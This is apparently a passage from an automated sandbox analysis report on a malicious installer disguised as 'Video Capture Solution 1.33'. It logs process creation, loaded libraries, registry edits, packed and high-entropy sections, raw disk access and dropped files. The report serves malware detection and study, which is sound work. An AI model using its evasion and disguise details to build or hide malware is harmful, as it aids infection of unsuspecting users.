                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: AbC0LBkVhr.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeFile read: C:\Users\user\Desktop\AbC0LBkVhr.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\AbC0LBkVhr.exe "C:\Users\user\Desktop\AbC0LBkVhr.exe"
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_capture_solution_11223
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_capture_solution_11223Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223Jump to behavior
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Capture Solution_is1Jump to behavior
                    Source: AbC0LBkVhr.exeStatic file information: File size 3774004 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-297HU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-MJRUC.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-297HU.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-GSMNO.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-MJRUC.tmp.1.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeUnpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack _rste_2:ER;_rstf_2:R;_rstg_2:W;.rsrc:R;_rsth_2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeUnpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: initial sampleStatic PE information: section where entry point is pointing to: _rste_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rste_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rstf_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rstg_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rsth_2
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /4
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /19
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /35
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /51
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /63
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /77
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /89
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /102
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /113
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /124
                    Source: is-GSMNO.tmp.1.drStatic PE information: section name: Shared
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rste_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rstf_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rstg_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rsth_2
                    Source: sqlite3.dll.4.drStatic PE information: section name: /4
                    Source: sqlite3.dll.4.drStatic PE information: section name: /19
                    Source: sqlite3.dll.4.drStatic PE information: section name: /35
                    Source: sqlite3.dll.4.drStatic PE information: section name: /51
                    Source: sqlite3.dll.4.drStatic PE information: section name: /63
                    Source: sqlite3.dll.4.drStatic PE information: section name: /77
                    Source: sqlite3.dll.4.drStatic PE information: section name: /89
                    Source: sqlite3.dll.4.drStatic PE information: section name: /102
                    Source: sqlite3.dll.4.drStatic PE information: section name: /113
                    Source: sqlite3.dll.4.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040993C push 00409979h; ret 1_2_00409971
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040A037 push ds; ret 1_2_0040A038
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004941B8 push ecx; mov dword ptr [esp], ecx1_2_004941BD
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004106C8 push ecx; mov dword ptr [esp], edx1_2_004106CD
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00412920 push 00412983h; ret 1_2_0041297B
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00484BE8 push ecx; mov dword ptr [esp], ecx1_2_00484BED
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040D020 push ecx; mov dword ptr [esp], edx1_2_0040D022
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004590F0 push 00459134h; ret 1_2_0045912C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00443438 push ecx; mov dword ptr [esp], ecx1_2_0044343C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00483544 push 00483633h; ret 1_2_0048362B
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040F580 push ecx; mov dword ptr [esp], edx1_2_0040F582
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0047759C push ecx; mov dword ptr [esp], edx1_2_0047759D
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004517CC push 004517FFh; ret 1_2_004517F7
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00451990 push ecx; mov dword ptr [esp], eax1_2_00451995
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045FB44 push ecx; mov dword ptr [esp], ecx1_2_0045FB48
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00419C20 push ecx; mov dword ptr [esp], ecx1_2_00419C25
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rste_2 entropy: 7.746459346219707
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rste_2 entropy: 7.746459346219707

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_02DBF8A2
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeFile created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy)
